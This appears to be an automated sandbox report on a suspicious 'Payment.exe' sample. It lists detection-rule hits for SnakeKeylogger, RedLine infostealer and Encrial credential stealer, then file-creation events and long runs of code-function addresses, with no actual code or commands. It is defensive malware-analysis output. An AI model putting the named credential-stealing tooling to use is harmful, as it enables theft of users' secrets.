Source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Payment.exe.3f7a328.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Payment.exe.411b348.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.Payment.exe.3f7a328.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 18.2.jwBqGZseW.exe.44e24c8.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: Payment.exe PID: 7248, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: jwBqGZseW.exe PID: 6056, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Payment.exe

Source: C:\Windows\System32\AppVClient.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\89ead7124fd5c239.bin
Source: C:\Windows\System32\FXSSVC.exe	File created: C:\Windows\TEMP\FXSSVCDebugLogFile.txt
Source: C:\Windows\System32\Spectrum.exe	File created: C:\Windows\Temp\DiagOutputDir
Source: C:\Windows\System32\wbengine.exe	File created: C:\Windows\Logs\WindowsBackup
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0145D404	0_2_0145D404
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_02ED1BF0	0_2_02ED1BF0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_02ED0040	0_2_02ED0040
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_02ED0006	0_2_02ED0006
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_052EDE50	0_2_052EDE50
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_052E8F29	0_2_052E8F29
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_052E80C8	0_2_052E80C8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_052E80D8	0_2_052E80D8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_07483B38	0_2_07483B38
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_074878F0	0_2_074878F0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_07488640	0_2_07488640
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_07488630	0_2_07488630
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0748F378	0_2_0748F378
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_07487391	0_2_07487391
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_074873A0	0_2_074873A0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_07486F58	0_2_07486F58
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_07486F68	0_2_07486F68
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_07488FE0	0_2_07488FE0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_07488FF0	0_2_07488FF0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_07483B2B	0_2_07483B2B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_07486B30	0_2_07486B30
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_00408C60	8_2_00408C60
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0040DC11	8_2_0040DC11
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_00407C3F	8_2_00407C3F
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_00418CCC	8_2_00418CCC
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_00406CA0	8_2_00406CA0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_004028B0	8_2_004028B0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0041A4BE	8_2_0041A4BE
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_00418244	8_2_00418244
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_00402F20	8_2_00402F20
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_004193C4	8_2_004193C4
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_00418788	8_2_00418788
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_00402F89	8_2_00402F89
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_00402B90	8_2_00402B90
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_004073A0	8_2_004073A0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E48286	8_2_02E48286
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E4B8F6	8_2_02E4B8F6
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E47B71	8_2_02E47B71
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E46EAF	8_2_02E46EAF
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E47F80	8_2_02E47F80
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E705D0	8_2_02E705D0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03ADD20B	8_2_03ADD20B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03ADD7B8	8_2_03ADD7B8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03ADA608	8_2_03ADA608
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03ADC658	8_2_03ADC658
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03AD74E0	8_2_03AD74E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03ADD4E0	8_2_03ADD4E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03ADDA90	8_2_03ADDA90
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03ADC980	8_2_03ADC980
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03AD586F	8_2_03AD586F
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03ADCF30	8_2_03ADCF30
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03ADEEE0	8_2_03ADEEE0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03AD6E20	8_2_03AD6E20
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03ADCC58	8_2_03ADCC58
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03AD4311	8_2_03AD4311
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03ADC6A8	8_2_03ADC6A8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03AD2F29	8_2_03AD2F29
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_03ADEED0	8_2_03ADEED0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A7FE0	8_2_070A7FE0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A8A40	8_2_070A8A40
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A9818	8_2_070A9818
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A2300	8_2_070A2300
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AAF00	8_2_070AAF00
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A771F	8_2_070A771F
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AAF10	8_2_070AAF10
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070ACF29	8_2_070ACF29
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A5322	8_2_070A5322
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070ACF38	8_2_070ACF38
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A5330	8_2_070A5330
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A7730	8_2_070A7730
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A2748	8_2_070A2748
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A2758	8_2_070A2758
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AEF51	8_2_070AEF51
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AEF60	8_2_070AEF60
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A5778	8_2_070A5778
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A7B79	8_2_070A7B79
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A5788	8_2_070A5788
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A7B88	8_2_070A7B88
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AB39A	8_2_070AB39A
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AB3A8	8_2_070AB3A8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A2BA1	8_2_070A2BA1
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A2BB0	8_2_070A2BB0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A7FCF	8_2_070A7FCF
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AD3C0	8_2_070AD3C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AD3D0	8_2_070AD3D0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A5BD0	8_2_070A5BD0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AF3E9	8_2_070AF3E9
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A5BE0	8_2_070A5BE0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AF3F8	8_2_070AF3F8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A2FF7	8_2_070A2FF7
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AC608	8_2_070AC608
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AE620	8_2_070AE620
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AE630	8_2_070AE630
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A8A31	8_2_070A8A31
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A1A40	8_2_070A1A40
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A1A50	8_2_070A1A50
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AAA68	8_2_070AAA68
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AAA78	8_2_070AAA78
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A4A72	8_2_070A4A72
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A6E70	8_2_070A6E70
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A4A80	8_2_070A4A80
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A6E80	8_2_070A6E80
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070ACA92	8_2_070ACA92
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A1E97	8_2_070A1E97
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A1EA8	8_2_070A1EA8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070ACAA0	8_2_070ACAA0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AEAB8	8_2_070AEAB8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AEAC8	8_2_070AEAC8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A4EC7	8_2_070A4EC7
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A4ED8	8_2_070A4ED8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A72D8	8_2_070A72D8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A72D2	8_2_070A72D2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A22F1	8_2_070A22F1
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070ADD00	8_2_070ADD00
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A3D10	8_2_070A3D10
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A0D39	8_2_070A0D39
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AA139	8_2_070AA139
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A0D48	8_2_070A0D48
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AA148	8_2_070AA148
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AC161	8_2_070AC161
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AC170	8_2_070AC170
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AE188	8_2_070AE188
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AE198	8_2_070AE198
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A1190	8_2_070A1190
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A11A0	8_2_070A11A0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AA5D1	8_2_070AA5D1
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A15E9	8_2_070A15E9
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AA5E0	8_2_070AA5E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A15F8	8_2_070A15F8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AC5F8	8_2_070AC5F8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A3008	8_2_070A3008
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A0006	8_2_070A0006
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A9807	8_2_070A9807
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A6027	8_2_070A6027
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A6038	8_2_070A6038
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AB830	8_2_070AB830
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A0040	8_2_070A0040
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AB840	8_2_070AB840
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AD858	8_2_070AD858
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A3452	8_2_070A3452
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AD868	8_2_070AD868
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A3460	8_2_070A3460
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A0488	8_2_070A0488
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A6482	8_2_070A6482
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AF881	8_2_070AF881
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A0498	8_2_070A0498
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A6490	8_2_070A6490
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070AF890	8_2_070AF890
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A38A9	8_2_070A38A9
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A9CA2	8_2_070A9CA2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A38B8	8_2_070A38B8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A9CB0	8_2_070A9CB0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070ABCC8	8_2_070ABCC8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070ABCD8	8_2_070ABCD8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A68D8	8_2_070A68D8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A08DF	8_2_070A08DF
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A68E8	8_2_070A68E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070A08F0	8_2_070A08F0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_070ADCF0	8_2_070ADCF0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C6418	8_2_071C6418
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CE138	8_2_071CE138
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C4980	8_2_071C4980
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C50D8	8_2_071C50D8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C091F	8_2_071C091F
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CB118	8_2_071CB118
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C7C19	8_2_071C7C19
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CC919	8_2_071CC919
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C201A	8_2_071C201A
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C370F	8_2_071C370F
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C9908	8_2_071C9908
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CE608	8_2_071CE608
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C6408	8_2_071C6408
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CB108	8_2_071CB108
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C0006	8_2_071C0006
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C9438	8_2_071C9438
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C5F38	8_2_071C5F38
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CAC38	8_2_071CAC38
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CF938	8_2_071CF938
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C0930	8_2_071C0930
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C2028	8_2_071C2028
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C7C28	8_2_071C7C28
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CC928	8_2_071CC928
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CE128	8_2_071CE128
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C9429	8_2_071C9429
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C3720	8_2_071C3720
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C2958	8_2_071C2958
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C7758	8_2_071C7758
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CC458	8_2_071CC458
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C8F58	8_2_071C8F58
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CDC58	8_2_071CDC58
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CC457	8_2_071CC457
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C4050	8_2_071C4050
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C1251	8_2_071C1251
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C5F48	8_2_071C5F48
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CAC48	8_2_071CAC48
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CF948	8_2_071CF948
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C2948	8_2_071C2948
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C774A	8_2_071C774A
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C0040	8_2_071C0040
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C4042	8_2_071C4042
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C5A78	8_2_071C5A78
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CA778	8_2_071CA778
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CF478	8_2_071CF478
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C3278	8_2_071C3278
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C727A	8_2_071C727A
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C4971	8_2_071C4971
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CA772	8_2_071CA772
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C8F68	8_2_071C8F68
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CDC68	8_2_071CDC68
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C5A68	8_2_071C5A68
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CF468	8_2_071CF468
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C1260	8_2_071C1260
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C8A98	8_2_071C8A98
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CD798	8_2_071CD798
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C5598	8_2_071C5598
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CEF9A	8_2_071CEF9A
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C1B90	8_2_071C1B90
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C3288	8_2_071C3288
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C7288	8_2_071C7288
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CBF88	8_2_071CBF88
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CD788	8_2_071CD788
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C8A89	8_2_071C8A89
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CBF87	8_2_071CBF87
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C1B81	8_2_071C1B81
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C3BB8	8_2_071C3BB8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C6DB8	8_2_071C6DB8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CBAB8	8_2_071CBAB8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C0DB8	8_2_071C0DB8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C85B9	8_2_071C85B9
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C24B0	8_2_071C24B0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C55A8	8_2_071C55A8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CA2A8	8_2_071CA2A8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CEFA8	8_2_071CEFA8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C3BA8	8_2_071C3BA8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C6DAA	8_2_071C6DAA
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CBAAA	8_2_071CBAAA
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CA2A2	8_2_071CA2A2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C04D8	8_2_071C04D8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C9DD8	8_2_071C9DD8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CEAD8	8_2_071CEAD8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C44D8	8_2_071C44D8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CB5D8	8_2_071CB5D8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C68D9	8_2_071C68D9
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C50D1	8_2_071C50D1
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C0DC8	8_2_071C0DC8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C85C8	8_2_071C85C8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CD2C8	8_2_071CD2C8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C04C8	8_2_071C04C8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C9DC8	8_2_071C9DC8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CEAC8	8_2_071CEAC8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C24C0	8_2_071C24C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C16F8	8_2_071C16F8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C80F8	8_2_071C80F8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CCDF8	8_2_071CCDF8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C98F8	8_2_071C98F8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CE5F8	8_2_071CE5F8
